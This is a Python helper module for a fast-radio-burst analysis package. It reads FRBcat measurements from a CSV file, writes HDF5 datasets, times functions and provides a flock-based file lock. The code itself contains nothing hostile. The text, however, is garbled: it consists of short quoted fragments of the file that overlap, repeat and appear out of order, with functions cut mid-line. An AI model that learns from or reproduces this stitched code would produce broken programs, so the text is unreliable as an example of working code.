"string: return float('NaN') return float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\"",
"#FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None,",
"return -1 ## wrapper to show time needed for some function ''' def",
"those FRBs observed by telescope with RM and tau ### print_number:True print number",
"zip( datas, keys ): try: f[key][()] f.__delitem__( key ) except: pass f.create_dataset( key,",
"= None # Try to remove the lock file, but don't try too",
"FRBs in FRBcat read with GetFRBcat() \"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal']",
"= [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read",
"yt, csv from time import time, sleep from PreFRBLE.file_system import * from PreFRBLE.parameter",
"sleep(3e-2) tries += 1 pass else: print( \"couldn't write \", keys ) sys.exit(1)",
"None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time() while True: try:",
"time needed to call function f \"\"\" t0 = time() ret = f(",
"in FRBcat \"\"\" ### read all FRBs from FRBcat ### optional: read only",
"that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries < 30: #try:",
"telescopes] ) : continue if tau and ( row[i_tau] == 'null' ) :",
"('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat(",
"function \"\"\" def MeasureTime(): t0 = time() res = func( *args, **kwargs) print(",
"the time needed to call function f \"\"\" t0 = time() ret =",
"if True, only return FRBs observed with RM tau : boolean if True,",
"for row in reader: if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for",
"else: print( \"couldn't write \", keys ) sys.exit(1) ## Read FRBcat #FRB_dtype =",
"dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return np.array( FRBs, dtype=FRB_dtype",
"FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM'] ## flocker to keep parallel processes",
"by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock: \"\"\"Provides the simplest possible",
"https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries < 30: #try: with h5.File( filename, 'a'",
"perform action on the locked file(s) ## file is locked when with starts",
"is paused until lock is released, then with is performed ''' def first(iterable,",
"the user see whether a lock # exists by examining the filesystem. try:",
"FRBs = [] with open( frbcat_file, 'r') as f: reader = csv.reader( f",
"__future__ import print_function import sys, h5py as h5, numpy as np, yt, csv",
"Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently write datas to keys in filename.",
"conveniently write datas to keys in filename. overwrite existing entries \"\"\" if type(keys)",
"keep parallel processes from writing to same file simultaneously ## provided by derpston,",
"because it is # unnecessary. This is mostly to help the user see",
"read only those FRBs observed by telescope with RM and tau ### print_number:True",
"telescopes are ignored RM : boolean if True, only return FRBs observed with",
"file is locked, code is paused until lock is released, then with is",
"RM=None, tau=None, print_number=False ): \"\"\" read all FRBs in FRBcat, downloaded to frbcat_file",
"first( (1,2,3), condition=lambda x: x > 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\"",
"header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header == 'rmp_rm' )[0][0] i_tau =",
"return float('NaN') return float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns",
"but don't try too hard because it is # unnecessary. This is mostly",
"it is # unnecessary. This is mostly to help the user see whether",
"SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary file that tells whether the lock",
"given, returns the first item of the iterable. Returns -1 if no item",
"= [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None,",
"condition is not given, returns the first item of the iterable. Returns -1",
"fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try to remove the lock file,",
"\"couldn't write \", keys ) sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'),",
"dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return",
"processes from writing to same file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import",
"## wrapper to write hdf5 files consistently def Write2h5( filename='', datas=[], keys=[] ):",
"('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read all FRBs",
"FRBcat ### optional: read only those FRBs observed by telescope with RM and",
"t0 = time() res = func( *args, **kwargs) print( \"{} took {} s\".format(",
"\"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM']",
"will create/truncate/delete the lock file as necessary.\"\"\" def __init__(self, path, timeout = None):",
"os.O_CREAT) start_lock_search = time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock",
"must fit order of FRB_dtype for row in reader: if telescopes and (",
"while tries < 30: #try: with h5.File( filename, 'a' ) as f: for",
"fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try to remove the lock file, but",
"string, dtype='U' ): \"\"\" short wrapper to decode byte-strings read from FRBcat \"\"\"",
"+= 1 pass else: print( \"couldn't write \", keys ) sys.exit(1) ## Read",
"read all FRBs in FRBcat, downloaded to frbcat_file Parameters ---------- telescopes : list",
"row in reader: if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele",
"for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return np.array(",
"h5 file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries",
"= np.where( header == 'rmp_rm' )[0][0] i_tau = np.where( header == 'rmp_scattering' )[0][0]",
"return float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures of",
"its left ## if file is locked, code is paused until lock is",
"item satysfing the condition is found. >>> first( (1,2,3), condition=lambda x: x %",
"call function f \"\"\" t0 = time() ret = f( *args, **kwargs )",
"the lock is active ## perform action on the locked file(s) ## file",
"and tau ### print_number:True print number of extracted FRBs FRBs = [] with",
"dtype=FRB_dtype ) def decode( string, dtype='U' ): \"\"\" short wrapper to decode byte-strings",
"GetFRBcat() \"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return",
"%i minutes and %.1f seconds %s\" % (f.__name__, t//60, t%60, print_additional ) )",
"to compute function \"\"\" def MeasureTime(): t0 = time() res = func( *args,",
"== 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header == 'rmp_rm' )[0][0] i_tau = np.where(",
"= func( *args, **kwargs) print( \"{} took {} s\".format( func.__name__, time()-t0 ) )",
"temporary file that tells whether the lock is active ## perform action on",
"FRBs from FRBcat ### optional: read only those FRBs observed by telescope with",
"temporarily unavailable raise elif self._timeout is not None and time() > (start_lock_search +",
"the lock file as necessary.\"\"\" def __init__(self, path, timeout = None): self._path =",
"for use with the `with` syntax. It will create/truncate/delete the lock file as",
"tau ### print_number:True print number of extracted FRBs FRBs = [] with open(",
"help the user see whether a lock # exists by examining the filesystem.",
"Lock acquired! return except (OSError, IOError) as ex: if ex.errno != errno.EAGAIN: #",
"existing entries \"\"\" if type(keys) is str: sys.exit( 'Write2h5 needs list of datas",
"header == 'rmp_dm' )[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM =",
"tau and ( row[i_tau] == 'null' ) : continue if RM and (",
"'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order",
"float('NaN') return float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures",
"None # Try to remove the lock file, but don't try too hard",
"lock is active ## perform action on the locked file(s) ## file is",
"= f( *args, **kwargs ) t = time() - t0 print( \"Running %s",
"the simplest possible interface to flock-based file locking. Intended for use with the",
"== 'rmp_rm' )[0][0] i_tau = np.where( header == 'rmp_scattering' )[0][0] i_zs = np.where(",
"**kwargs) print( \"{} took {} s\".format( func.__name__, time()-t0 ) ) return res return",
"if True, only return FRBs observed with temproal broadening print_number : boolean if",
"'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM'] ## flocker to keep",
"= os.open(self._path, os.O_CREAT) start_lock_search = time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB)",
"\"\"\" if type(keys) is str: sys.exit( 'Write2h5 needs list of datas and keys'",
"needs list of datas and keys' ) ### small workaround to allow for",
"h5, numpy as np, yt, csv from time import time, sleep from PreFRBLE.file_system",
"`with` syntax. It will create/truncate/delete the lock file as necessary.\"\"\" def __init__(self, path,",
"x in iterable if condition(x)) except: return -1 ## wrapper to show time",
"-1 ## wrapper to show time needed for some function ''' def HowLong(",
"ret = f( *args, **kwargs ) t = time() - t0 print( \"Running",
"interface to flock-based file locking. Intended for use with the `with` syntax. It",
"USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary file that tells whether",
"f[key][()] f.__delitem__( key ) except: pass f.create_dataset( key, data=data ) break #except: sleep(3e-2)",
"as f: reader = csv.reader( f ) header = np.array(next(reader)) # header =",
"is locked when with starts until its left ## if file is locked,",
"be nice to avoid an arbitrary sleep here, but spinning # without a",
"order of FRB_dtype for row in reader: if telescopes and ( row[i_tele] not",
"2): ## \"locktest\" is a temporary file that tells whether the lock is",
"when with starts until its left ## if file is locked, code is",
"files consistently def Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently write datas to",
"in FRBcat, downloaded to frbcat_file Parameters ---------- telescopes : list list of considered",
"[i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must fit order of",
"by examining the filesystem. try: os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\", 2):",
"iterable if condition(x)) except: return -1 ## wrapper to show time needed for",
"sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'),",
"class SimpleFlock: \"\"\"Provides the simplest possible interface to flock-based file locking. Intended for",
"nodes in your h5 file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries =",
"def HowLong( f, *args, print_additional='', **kwargs ): \"\"\" wrapper to print the time",
"= [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must fit order",
"frbcat_file Parameters ---------- telescopes : list list of considered telescopes, FRBs of other",
"= None): self._path = path self._timeout = timeout self._fd = None def __enter__(self):",
"write hdf5 files consistently def Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently write",
"unnecessary. This is mostly to help the user see whether a lock #",
"satisfies the `condition`. If the condition is not given, returns the first item",
"telescope with RM and tau ### print_number:True print number of extracted FRBs FRBs",
"to keep parallel processes from writing to same file simultaneously ## provided by",
"arbitrary sleep here, but spinning # without a delay is also undesirable. sleep(0.1)",
"and ( row[i_tau] == 'null' ) : continue if RM and ( row[i_RM]",
"see whether a lock # exists by examining the filesystem. try: os.unlink(self._path) except:",
"is locked, code is paused until lock is released, then with is performed",
"*args, print_additional='', **kwargs ): \"\"\" wrapper to print the time needed to call",
"file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries <",
"read with GetFRBcat() \"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure ==",
"## file is locked when with starts until its left ## if file",
"[telescopes_FRBcat[tele] for tele in telescopes] ) : continue if tau and ( row[i_tau]",
"f( *args, **kwargs ) t = time() - t0 print( \"Running %s took",
"compute function \"\"\" def MeasureTime(): t0 = time() res = func( *args, **kwargs)",
"GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read all FRBs in FRBcat, downloaded",
"'rmp_redshift_host' )[0][0] i_tele = np.where( header == 'telescope' )[0][0] i_s = [i_ID, i_DM,",
"'null' ) : continue if RM and ( row[i_RM] == 'null' ) :",
"True, print number of extractet FRBs Returns ------- FRBs : array structured numpy.array",
"def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time() while True: try: fcntl.flock(self._fd,",
"reader: if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes]",
"np.array(FRB_dtype)[:,1] ) ] ) ) return np.array( FRBs, dtype=FRB_dtype ) def decode( string,",
"print_function import sys, h5py as h5, numpy as np, yt, csv from time",
"i_RM = np.where( header == 'rmp_rm' )[0][0] i_tau = np.where( header == 'rmp_scattering'",
"fcntl, errno class SimpleFlock: \"\"\"Provides the simplest possible interface to flock-based file locking.",
") sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'),",
"time()-t0 ) ) return res return MeasureTime() from time import sleep ## wrapper",
"as ex: if ex.errno != errno.EAGAIN: # Resource temporarily unavailable raise elif self._timeout",
"file that tells whether the lock is active ## perform action on the",
"timeout self._fd = None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time()",
"took %i minutes and %.1f seconds %s\" % (f.__name__, t//60, t%60, print_additional )",
"3 >>> first( (1,2,3), condition=lambda x: x > 9) -1 THANKS TO Caridorc",
"\"locktest\" is a temporary file that tells whether the lock is active ##",
"as np, yt, csv from time import time, sleep from PreFRBLE.file_system import *",
"observed with RM tau : boolean if True, only return FRBs observed with",
"np.array(reader.next()) i_ID = 0 i_DM = np.where( header == 'rmp_dm' )[0][0] i_DM_gal =",
"FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] )",
"np.array( FRBs, dtype=FRB_dtype ) def decode( string, dtype='U' ): \"\"\" short wrapper to",
"( row[i_tau] == 'null' ) : continue if RM and ( row[i_RM] ==",
"print( \"{} took {} s\".format( func.__name__, time()-t0 ) ) return res return MeasureTime()",
"= 0 i_DM = np.where( header == 'rmp_dm' )[0][0] i_DM_gal = np.where( header",
"allow for parallel computation. Use with caution, might corrupt nodes in your h5",
"item in the `iterable` that satisfies the `condition`. If the condition is not",
"in reader: if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele in",
"in iterable if condition(x)) except: return -1 ## wrapper to show time needed",
"and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes] ) : continue",
"except: pass f.create_dataset( key, data=data ) break #except: sleep(3e-2) tries += 1 pass",
"start_lock_search = time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired!",
"if ex.errno != errno.EAGAIN: # Resource temporarily unavailable raise elif self._timeout is not",
"1 pass else: print( \"couldn't write \", keys ) sys.exit(1) ## Read FRBcat",
"'rmp_scattering' )[0][0] i_zs = np.where( header == 'rmp_redshift_host' )[0][0] i_tele = np.where( header",
"elif measure == 'RM': return FRBs['RM'] ## flocker to keep parallel processes from",
"\"\"\" ### read all FRBs from FRBcat ### optional: read only those FRBs",
"considered telescopes, FRBs of other telescopes are ignored RM : boolean if True,",
"== 'rmp_redshift_host' )[0][0] i_tele = np.where( header == 'telescope' )[0][0] i_s = [i_ID,",
"performed ''' def first(iterable, condition = lambda x: True): \"\"\" Returns the first",
"parallel computation. Use with caution, might corrupt nodes in your h5 file. in",
"FRBs observed with temproal broadening print_number : boolean if True, print number of",
"lock is released, then with is performed ''' def first(iterable, condition = lambda",
"taken to compute function \"\"\" def MeasureTime(): t0 = time() res = func(",
"an arbitrary sleep here, but spinning # without a delay is also undesirable.",
"# exists by examining the filesystem. try: os.unlink(self._path) except: pass ''' USAGE with",
"i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return np.array( FRBs, dtype=FRB_dtype ) def decode(",
"True): \"\"\" Returns the first item in the `iterable` that satisfies the `condition`.",
"return FRBs observed with RM tau : boolean if True, only return FRBs",
"__enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX",
"dtype='U' ): \"\"\" short wrapper to decode byte-strings read from FRBcat \"\"\" if",
"If the condition is not given, returns the first item of the iterable.",
"return next(x for x in iterable if condition(x)) except: return -1 ## wrapper",
"in zip( datas, keys ): try: f[key][()] f.__delitem__( key ) except: pass f.create_dataset(",
"ex: if ex.errno != errno.EAGAIN: # Resource temporarily unavailable raise elif self._timeout is",
"---------- telescopes : list list of considered telescopes, FRBs of other telescopes are",
"np.where( header == 'rmp_rm' )[0][0] i_tau = np.where( header == 'rmp_scattering' )[0][0] i_zs",
"nice to avoid an arbitrary sleep here, but spinning # without a delay",
"time() > (start_lock_search + self._timeout): # Exceeded the user-specified timeout. print( \"timeout exceeded\"",
"without a delay is also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd)",
"boolean if True, only return FRBs observed with temproal broadening print_number : boolean",
"of the iterable. Returns -1 if no item satysfing the condition is found.",
"is found. >>> first( (1,2,3), condition=lambda x: x % 2 == 0) 2",
"= time() res = func( *args, **kwargs) print( \"{} took {} s\".format( func.__name__,",
"= time() ret = f( *args, **kwargs ) t = time() - t0",
"return except (OSError, IOError) as ex: if ex.errno != errno.EAGAIN: # Resource temporarily",
"= None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time() while True:",
"self._path = path self._timeout = timeout self._fd = None def __enter__(self): self._fd =",
"'RM': return FRBs['RM'] ## flocker to keep parallel processes from writing to same",
"lock file as necessary.\"\"\" def __init__(self, path, timeout = None): self._path = path",
"Resource temporarily unavailable raise elif self._timeout is not None and time() > (start_lock_search",
"### read all FRBs from FRBcat ### optional: read only those FRBs observed",
"sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try to",
"= lambda x: True): \"\"\" Returns the first item in the `iterable` that",
"!= errno.EAGAIN: # Resource temporarily unavailable raise elif self._timeout is not None and",
"[('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')]",
"f ) header = np.array(next(reader)) # header = np.array(reader.next()) i_ID = 0 i_DM",
"in FRBcat read with GetFRBcat() \"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif",
"parallel processes from writing to same file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14",
"{} s\".format( func.__name__, time()-t0 ) ) return res return MeasureTime() from time import",
"write \", keys ) sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')]",
"): \"\"\" short wrapper to decode byte-strings read from FRBcat \"\"\" if 'f'",
"acquired! return except (OSError, IOError) as ex: if ex.errno != errno.EAGAIN: # Resource",
"RM and ( row[i_RM] == 'null' ) : continue FRBs.append( tuple( [ decode(row[i].split('&')[0],",
"time import time, sleep from PreFRBLE.file_system import * from PreFRBLE.parameter import * from",
"might corrupt nodes in your h5 file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632",
"number of extractet FRBs Returns ------- FRBs : array structured numpy.array containing values",
"%.1f seconds %s\" % (f.__name__, t//60, t%60, print_additional ) ) return ret '''",
"i_tele = np.where( header == 'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM,",
"delay is also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd =",
"filename, 'a' ) as f: for data, key in zip( datas, keys ):",
"with caution, might corrupt nodes in your h5 file. in that case, visit:",
") raise # TODO It would be nice to avoid an arbitrary sleep",
"def first(iterable, condition = lambda x: True): \"\"\" Returns the first item in",
"data, key in zip( datas, keys ): try: f[key][()] f.__delitem__( key ) except:",
"from PreFRBLE.file_system import * from PreFRBLE.parameter import * from time import time def",
"first item of the iterable. Returns -1 if no item satysfing the condition",
"print_number : boolean if True, print number of extractet FRBs Returns ------- FRBs",
"if tau and ( row[i_tau] == 'null' ) : continue if RM and",
"tau : boolean if True, only return FRBs observed with temproal broadening print_number",
"too hard because it is # unnecessary. This is mostly to help the",
"show time needed for some function ''' def HowLong( f, *args, print_additional='', **kwargs",
"= time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return",
"timeout. print( \"timeout exceeded\" ) raise # TODO It would be nice to",
"don't try too hard because it is # unnecessary. This is mostly to",
"\", keys ) sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype",
"the `with` syntax. It will create/truncate/delete the lock file as necessary.\"\"\" def __init__(self,",
"### small workaround to allow for parallel computation. Use with caution, might corrupt",
"telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read all FRBs in FRBcat, downloaded to",
")[0][0] i_tele = np.where( header == 'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal,",
"wrapper to decode byte-strings read from FRBcat \"\"\" if 'f' in dtype: if",
"with starts until its left ## if file is locked, code is paused",
"* from PreFRBLE.parameter import * from time import time def TimeElapsed( func, *args,",
"decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) )",
"numpy as np, yt, csv from time import time, sleep from PreFRBLE.file_system import",
"ex.errno != errno.EAGAIN: # Resource temporarily unavailable raise elif self._timeout is not None",
"minutes and %.1f seconds %s\" % (f.__name__, t//60, t%60, print_additional ) ) return",
"< 30: #try: with h5.File( filename, 'a' ) as f: for data, key",
"hdf5 files consistently def Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently write datas",
"= csv.reader( f ) header = np.array(next(reader)) # header = np.array(reader.next()) i_ID =",
"> (start_lock_search + self._timeout): # Exceeded the user-specified timeout. print( \"timeout exceeded\" )",
"FRBs of other telescopes are ignored RM : boolean if True, only return",
"| fcntl.LOCK_NB) # Lock acquired! return except (OSError, IOError) as ex: if ex.errno",
"FRBs : array structured numpy.array containing values listed in FRBcat \"\"\" ### read",
"sleep from PreFRBLE.file_system import * from PreFRBLE.parameter import * from time import time",
"import os, fcntl, errno class SimpleFlock: \"\"\"Provides the simplest possible interface to flock-based",
"i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must fit",
"visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries < 30: #try: with h5.File(",
"with the `with` syntax. It will create/truncate/delete the lock file as necessary.\"\"\" def",
"a temporary file that tells whether the lock is active ## perform action",
"SimpleFlock: \"\"\"Provides the simplest possible interface to flock-based file locking. Intended for use",
") : continue if tau and ( row[i_tau] == 'null' ) : continue",
"first item in the `iterable` that satisfies the `condition`. If the condition is",
"GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures of FRBs in FRBcat read with",
"if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM'] ##",
"\"\"\" Returns the first item in the `iterable` that satisfies the `condition`. If",
"def Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently write datas to keys in",
"tau=None, print_number=False ): \"\"\" read all FRBs in FRBcat, downloaded to frbcat_file Parameters",
"locked when with starts until its left ## if file is locked, code",
"in the `iterable` that satisfies the `condition`. If the condition is not given,",
"condition is found. >>> first( (1,2,3), condition=lambda x: x % 2 == 0)",
"**kwargs ) t = time() - t0 print( \"Running %s took %i minutes",
"not None and time() > (start_lock_search + self._timeout): # Exceeded the user-specified timeout.",
"This is mostly to help the user see whether a lock # exists",
"return string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures of FRBs in",
"csv from time import time, sleep from PreFRBLE.file_system import * from PreFRBLE.parameter import",
"print( \"Running %s took %i minutes and %.1f seconds %s\" % (f.__name__, t//60,",
"('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def",
"same file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class",
"Intended for use with the `with` syntax. It will create/truncate/delete the lock file",
"starts until its left ## if file is locked, code is paused until",
"tries += 1 pass else: print( \"couldn't write \", keys ) sys.exit(1) ##",
"x % 2 == 0) 2 >>> first(range(3, 100)) 3 >>> first( (1,2,3),",
"frbcat_file, 'r') as f: reader = csv.reader( f ) header = np.array(next(reader)) #",
"Returns ------- FRBs : array structured numpy.array containing values listed in FRBcat \"\"\"",
"errno class SimpleFlock: \"\"\"Provides the simplest possible interface to flock-based file locking. Intended",
"is # unnecessary. This is mostly to help the user see whether a",
"of FRBs in FRBcat read with GetFRBcat() \"\"\" if measure == 'DM': return",
"os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary",
"if type(keys) is str: sys.exit( 'Write2h5 needs list of datas and keys' )",
": boolean if True, print number of extractet FRBs Returns ------- FRBs :",
"workaround to allow for parallel computation. Use with caution, might corrupt nodes in",
"structured numpy.array containing values listed in FRBcat \"\"\" ### read all FRBs from",
"( row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes] ) : continue if",
"x: True): \"\"\" Returns the first item in the `iterable` that satisfies the",
"`condition`. If the condition is not given, returns the first item of the",
"0) 2 >>> first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda x: x >",
"TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x in iterable if condition(x))",
"for x in iterable if condition(x)) except: return -1 ## wrapper to show",
"broadening print_number : boolean if True, print number of extractet FRBs Returns -------",
"if 'f' in dtype: if 'null' in string: return float('NaN') return float(string) return",
"dtype: if 'null' in string: return float('NaN') return float(string) return string def GetFRBsMeasures(",
"are ignored RM : boolean if True, only return FRBs observed with RM",
"break #except: sleep(3e-2) tries += 1 pass else: print( \"couldn't write \", keys",
"[] with open( frbcat_file, 'r') as f: reader = csv.reader( f ) header",
"self._fd = None # Try to remove the lock file, but don't try",
"needed to call function f \"\"\" t0 = time() ret = f( *args,",
"computation. Use with caution, might corrupt nodes in your h5 file. in that",
"entries \"\"\" if type(keys) is str: sys.exit( 'Write2h5 needs list of datas and",
"file as necessary.\"\"\" def __init__(self, path, timeout = None): self._path = path self._timeout",
"# header = np.array(reader.next()) i_ID = 0 i_DM = np.where( header == 'rmp_dm'",
"possible interface to flock-based file locking. Intended for use with the `with` syntax.",
"\"\"\" returns measures of FRBs in FRBcat read with GetFRBcat() \"\"\" if measure",
"== 'rmp_dm' )[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where(",
": continue if RM and ( row[i_RM] == 'null' ) : continue FRBs.append(",
"from time import sleep ## wrapper to write hdf5 files consistently def Write2h5(",
"= [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'),",
"try too hard because it is # unnecessary. This is mostly to help",
"is mostly to help the user see whether a lock # exists by",
"Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x in iterable if condition(x)) except:",
"FRBcat, downloaded to frbcat_file Parameters ---------- telescopes : list list of considered telescopes,",
"self._timeout = timeout self._fd = None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search",
"'null' in string: return float('NaN') return float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None",
